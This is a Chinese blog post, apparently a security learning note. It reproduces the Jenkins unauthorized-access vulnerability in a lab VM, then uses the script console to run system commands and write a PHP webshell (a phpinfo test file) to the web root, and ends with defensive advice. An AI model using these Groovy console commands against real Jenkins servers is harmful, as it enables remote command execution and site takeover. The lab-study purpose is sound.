未授权访问:Jenkins未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

 3、未授权访问

4、利用未授权访问写入webshell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第三篇是关于Jenkins的未授权访问

1、漏洞原理

  默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

2、环境搭建

首先就是下载Jenkins:

wget http://mirrors.jenkins.io/debian/jenkins_1.621_all.deb # 下载

下载地址:Jenkins mirrors

注:命令行下载是真的很慢,建议下载后直接上传到虚拟机中

dpkg -i jenkins_1.621_all.deb # 安装
sudo apt-get -f --fix-missing install # 如果有报依赖项的错误时执行

可以看到报错了,我们首选安装依赖包:

 

安装完依赖包后,就可以安装成功了

开启Jenkins服务
service jenkinis start

 

浏览器访问http://192.168.18.129:8080/
如下图所示说明环境搭建成功

 3、未授权访问

假设这就是一个互联网上的网站,我们访问ip/manage就可以实现未授权访问后台页面

可以看到确实直接未授权进入到了jenkins的后台管理页面

4、利用未授权访问写入webshell

点击“脚本命令执行”

执行系统命令

println "whoami".execute().text

网站路径:/var/www/html (需要具备一定的权限) 利用“脚本命令行”写webshell,点击运行没有报错,写入成功

new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>');

可以看到确实出现了权限不够的问题,这因为在本地我可以直接授权,但是真实案例就需要想办法进行权限提升了,这里因为只是学习我就直接授权了

执行成功后,访问shell.php

可以看到成功的访问到了上传的php文件

防御手段

  • -升级版本。
  • -添加认证,设置强密码复杂度及账号锁定。
  • -禁止把Jenkins直接暴露在公网。

到此,Jenkins未授权访问漏洞就学习完成了,后面更多知识再分享给大家(*^▽^*)

  • 25
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值